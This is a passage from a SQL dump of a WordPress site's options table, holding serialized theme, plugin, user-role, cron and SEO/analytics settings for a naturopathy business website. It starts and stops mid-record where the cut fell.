Divi/style.css\";i:1;s:77:\"/home/desid573/verdenaturopathy.com.au/wp-content/plugins/akismet/akismet.php\";i:2;s:80:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes/blossom-coach/style.css\";i:4;s:72:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes/Divi/header.php\";i:5;s:78:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes/Divi/theme-header.php\";}','no'),(40,'template','Divi','yes'),(41,'stylesheet','Divi','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','61833','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:2:{i:0;b:0;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:35:\"monsterinsights_lite_uninstall_hook\";}','yes'),(80,'timezone_string','','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','28','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','205','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1795227463','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'initial_db_version','49752','yes'),(99,'wpln_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:88:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"et_support_center\";b:1;s:24:\"et_support_center_system\";b:1;s:31:\"et_support_center_remote_access\";b:1;s:31:\"et_support_center_documentation\";b:1;s:27:\"et_support_center_safe_mode\";b:1;s:22:\"et_support_center_logs\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:17:\"aioseo_manage_seo\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:39:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:15:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:10:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:20:\"aioseo_page_analysis\";b:1;s:28:\"aioseo_page_general_settings\";b:1;s:29:\"aioseo_page_advanced_settings\";b:1;s:27:\"aioseo_page_schema_settings\";b:1;s:27:\"aioseo_page_social_settings\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(100,'fresh_site','0','off'),(101,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(106,'sidebars_widgets','a:10:{s:19:\"wp_inactive_widgets\";a:3:{i:0;s:6:\"meta-2\";i:1;s:8:\"search-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:3:{i:0;s:14:\"recent-posts-2\";i:1;s:10:\"archives-2\";i:2;s:12:\"categories-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:9:\"sidebar-6\";a:0:{}s:9:\"sidebar-7\";a:0:{}s:19:\"et_pb_widget_area_1\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(107,'cron','a:21:{i:1787414102;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1787420780;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1787421736;a:1:{s:40:\"monsterinsights_feature_feedback_checkin\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787421738;a:1:{s:35:\"monsterinsights_cache_daily_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787443498;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1787445126;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1787464526;a:1:{s:41:\"wp_privacy_personal_data_cleanup_requests\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787478317;a:1:{s:20:\"sgpbGetNotifications\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787486698;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787486903;a:3:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1787527640;a:1:{s:35:\"monsterinsights_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1787551200;a:1:{s:29:\"duplicator_email_summary_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:22:\"duplicator_weekly_cron\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1787592410;a:1:{s:30:\"duplicator_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:22:\"duplicator_weekly_cron\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1787671681;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1787853736;a:1:{s:46:\"monsterinsights_feature_feedback_clear_expired\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1788005098;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1788313439;a:1:{s:32:\"et_core_page_resource_auto_clear\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}i:1788458538;a:1:{s:42:\"monsterinsights_product_feed_monthly_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}i:1788649983;a:1:{s:36:\"monsterinsights_email_summaries_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:39:\"monsterinsights_email_summaries_monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}i:1789038441;a:1:{s:38:\"monsterinsights_charitable_notice_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:23:\"monsterinsights_monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}s:7:\"version\";i:2;}','on'),(108,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(116,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(118,'recovery_keys','a:0:{}','off'),(119,'theme_mods_twentytwentyone','a:1:{s:18:\"custom_css_post_id\";i:-1;}','no'),(120,'https_detection_errors','a:0:{}','off'),(544,'rsssl_mixed_content_scan_dismissed','1','yes'),(130,'pagelayer_options','a:0:{}','yes'),(255,'et_pb_builder_options','a:2:{i:0;b:0;s:35:\"email_provider_credentials_migrated\";b:1;}','yes'),(134,'pagelayer_import_images_tripo','no','yes'),(129,'pagelayer_version','1.4.8','yes'),(137,'category_children','a:0:{}','yes'),(131,'pagelayer_promo_time','1619870702','yes'),(132,'popularfx_version','1.1.7','yes'),(133,'pagelayer-copyright','© 2021 Verde Naturopathy | <a href=\"https://popularfx.com\">PopularFX Theme</a>','yes'),(138,'pagelayer_body_typography','a:4:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"14\";s:11:\"font-weight\";s:3:\"400\";s:11:\"line-height\";s:3:\"1.6\";}','yes'),(139,'pagelayer_p_css','a:4:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"14\";s:11:\"font-weight\";s:3:\"400\";s:11:\"line-height\";s:3:\"1.6\";}','yes'),(140,'pagelayer_a_css','a:2:{s:20:\"text-decoration-line\";s:4:\"none\";s:5:\"color\";s:9:\"#ffffffff\";}','yes'),(141,'pagelayer_a-hover_css','a:1:{s:5:\"color\";s:9:\"#efba6cff\";}','yes'),(142,'pagelayer_h1_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:3:\"260\";s:11:\"font-weight\";s:3:\"800\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:1:\"1\";s:5:\"color\";s:9:\"#efba6c43\";}','yes'),(143,'pagelayer_h1_typography_tablet','a:1:{s:9:\"font-size\";s:2:\"50\";}','yes'),(144,'pagelayer_h1_typography_mobile','a:1:{s:9:\"font-size\";s:2:\"35\";}','yes'),(145,'pagelayer_h2_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"75\";s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:1:\"1\";s:5:\"color\";s:9:\"#dedfdfa9\";}','yes'),(146,'pagelayer_h2_typography_mobile','a:1:{s:9:\"font-size\";s:2:\"60\";}','yes'),(147,'pagelayer_h3_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"45\";s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:1:\"1\";s:5:\"color\";s:9:\"#dedfdfa9\";}','yes'),(148,'pagelayer_h4_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"28\";s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:3:\"1.6\";s:5:\"color\";s:9:\"#ffffffff\";}','yes'),(149,'pagelayer_h5_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"19\";s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:3:\"1.6\";s:5:\"color\";s:9:\"#474747ff\";}','yes'),(150,'pagelayer_h6_typography','a:6:{s:11:\"font-family\";s:5:\"Cabin\";s:9:\"font-size\";s:2:\"16\";s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:11:\"line-height\";s:3:\"1.6\";s:5:\"color\";s:9:\"#efba6cff\";}','yes'),(151,'pagelayer_b_css','a:1:{s:11:\"font-weight\";s:3:\"700\";}','yes'),(152,'pagelayer_i_css','a:1:{s:10:\"font-style\";s:6:\"italic\";}','yes'),(153,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:2;}}','off'),(154,'pagelayer_theme_tripo_imported','1619784306','yes'),(155,'pagelayer_template_product_fix','0','yes'),(156,'theme_mods_popularfx','a:5:{s:18:\"popularfx_template\";s:5:\"tripo\";s:20:\"popularfx_show_promo\";i:1619870903;s:18:\"custom_css_post_id\";i:-1;s:15:\"popularfx_color\";a:1:{s:10:\"background\";s:7:\"#ccd4c8\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1619785501;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}}}}','no'),(158,'external_updates-popularfx-templates','O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1619833428;s:14:\"checkedVersion\";s:5:\"1.1.7\";s:6:\"update\";O:8:\"stdClass\":9:{s:2:\"id\";i:0;s:4:\"slug\";s:19:\"popularfx-templates\";s:7:\"version\";s:5:\"1.1.7\";s:8:\"homepage\";s:22:\"https://popularfx.com/\";s:6:\"tested\";s:3:\"5.4\";s:12:\"download_url\";s:54:\"https://a.softaculous.com/popularfx/update2.php?give=1\";s:14:\"upgrade_notice\";N;s:8:\"filename\";s:43:\"popularfx-templates/popularfx-templates.php\";s:12:\"translations\";a:0:{}}}','no'),(179,'finished_updating_comment_type','1','yes'),(24789,'user_count','1','no'),(16629,'monsterinsights_over_time','a:4:{s:17:\"installed_version\";s:5:\"8.5.0\";s:14:\"installed_date\";i:1651490597;s:13:\"installed_pro\";b:0;s:14:\"installed_lite\";i:1651490597;}','no'),(16630,'monsterinsights_db_version','7.4.0','yes'),(16631,'monsterinsights_current_version','10.0.1','yes'),(16632,'monsterinsights_settings','a:42:{s:22:\"enable_affiliate_links\";b:1;s:15:\"affiliate_links\";a:2:{i:0;a:2:{s:4:\"path\";s:4:\"/go/\";s:5:\"label\";s:9:\"affiliate\";}i:1;a:2:{s:4:\"path\";s:11:\"/recommend/\";s:5:\"label\";s:9:\"affiliate\";}}s:12:\"demographics\";i:1;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:19:\"dashboards_disabled\";i:0;s:13:\"anonymize_ips\";i:0;s:19:\"extensions_of_files\";s:34:\"doc,pdf,ppt,zip,xls,docx,pptx,xlsx\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"link_attribution\";b:1;s:16:\"tag_links_in_rss\";b:1;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:13:\"save_settings\";a:1:{i:0;s:13:\"administrator\";}s:12:\"view_reports\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:11:\"events_mode\";s:2:\"js\";s:13:\"tracking_mode\";s:4:\"gtag\";s:15:\"email_summaries\";s:2:\"on\";s:23:\"summaries_html_template\";s:3:\"yes\";s:25:\"summaries_email_addresses\";a:1:{i:0;a:1:{s:5:\"email\";s:20:\"mel-cann@live.com.au\";}}s:17:\"automatic_updates\";s:4:\"none\";s:26:\"popular_posts_inline_theme\";s:5:\"alpha\";s:26:\"popular_posts_widget_theme\";s:5:\"alpha\";s:28:\"popular_posts_products_theme\";s:5:\"alpha\";s:30:\"popular_posts_inline_placement\";s:6:\"manual\";s:34:\"popular_posts_widget_theme_columns\";s:1:\"2\";s:36:\"popular_posts_products_theme_columns\";s:1:\"2\";s:26:\"popular_posts_widget_count\";s:1:\"4\";s:28:\"popular_posts_products_count\";s:1:\"4\";s:38:\"popular_posts_widget_theme_meta_author\";s:2:\"on\";s:36:\"popular_posts_widget_theme_meta_date\";s:2:\"on\";s:40:\"popular_posts_widget_theme_meta_comments\";s:2:\"on\";s:39:\"popular_posts_products_theme_meta_price\";s:2:\"on\";s:40:\"popular_posts_products_theme_meta_rating\";s:2:\"on\";s:39:\"popular_posts_products_theme_meta_image\";s:2:\"on\";s:32:\"popular_posts_inline_after_count\";s:3:\"150\";s:36:\"popular_posts_inline_multiple_number\";s:1:\"3\";s:38:\"popular_posts_inline_multiple_distance\";s:3:\"250\";s:39:\"popular_posts_inline_multiple_min_words\";s:3:\"100\";s:31:\"popular_posts_inline_post_types\";a:1:{i:0;s:4:\"post\";}s:31:\"popular_posts_widget_post_types\";a:1:{i:0;s:4:\"post\";}s:19:\"verified_appearance\";s:5:\"light\";s:17:\"verified_position\";s:6:\"center\";}','yes'),(16599,'action_scheduler_hybrid_store_demarkation','380','yes'),(16600,'schema-ActionScheduler_StoreSchema','3.0.1651490289','yes'),(16601,'schema-ActionScheduler_LoggerSchema','2.0.1651490289','yes'),(16604,'aioseo_options_internal_lite','{\"internal\":{\"activated\":1651490289,\"firstActivated\":1651490289,\"installed\":0,\"connect\":{\"key\":null,\"time\":0,\"network\":false,\"token\":null}}}','yes'),(16628,'widget_monsterinsights-popular-posts-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16609,'widget_aioseo-breadcrumb-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16610,'widget_aioseo-html-sitemap-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16613,'aioseo_options_dynamic_localized','a:8:{s:42:\"searchAppearance_taxonomies_category_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:52:\"searchAppearance_taxonomies_category_metaDescription\";s:21:\"#taxonomy_description\";s:42:\"searchAppearance_taxonomies_post_tag_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:52:\"searchAppearance_taxonomies_post_tag_metaDescription\";s:21:\"#taxonomy_description\";s:50:\"searchAppearance_taxonomies_project_category_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:60:\"searchAppearance_taxonomies_project_category_metaDescription\";s:21:\"#taxonomy_description\";s:45:\"searchAppearance_taxonomies_project_tag_title\";s:41:\"#taxonomy_title #separator_sa #site_title\";s:55:\"searchAppearance_taxonomies_project_tag_metaDescription\";s:21:\"#taxonomy_description\";}','yes'),(16615,'aioseo_dynamic_settings_backup','{}','yes'),(16616,'aioseo_options','{\"internal\":[],\"webmasterTools\":{\"google\":null,\"bing\":null,\"yandex\":null,\"baidu\":null,\"pinterest\":null,\"microsoftClarityProjectId\":null,\"alexa\":null,\"norton\":null,\"miscellaneousVerification\":null},\"breadcrumbs\":{\"enable\":true,\"separator\":\"»\",\"homepageLink\":true,\"homepageLabel\":\"Home\",\"breadcrumbPrefix\":null,\"archiveFormat\":\"Archives for #breadcrumb_archive_post_type_name\",\"searchResultFormat\":\"Search Results for \'#breadcrumb_search_string\'\",\"errorFormat404\":\"404 - Page Not Found\",\"showCurrentItem\":true,\"linkCurrentItem\":false,\"categoryFullHierarchy\":false,\"showBlogHome\":false},\"rssContent\":{\"before\":null,\"after\":\"<p>The post #post_link first appeared on #site_link.<\\/p>\"},\"advanced\":{\"truSeo\":true,\"headlineAnalyzer\":true,\"seoAnalysis\":true,\"dashboardWidgets\":true,\"announcements\":true,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"uninstall\":false},\"sitemap\":{\"general\":{\"enable\":true,\"filename\":\"sitemap\",\"indexes\":true,\"linksPerIndex\":1000,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"attachment\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"author\":false,\"date\":false,\"additionalPages\":{\"enable\":false,\"pages\":[]},\"advancedSettings\":{\"enable\":false,\"excludeImages\":false,\"excludePosts\":[],\"excludeTerms\":[],\"priority\":{\"homePage\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"postTypes\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"taxonomies\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"archive\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"author\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",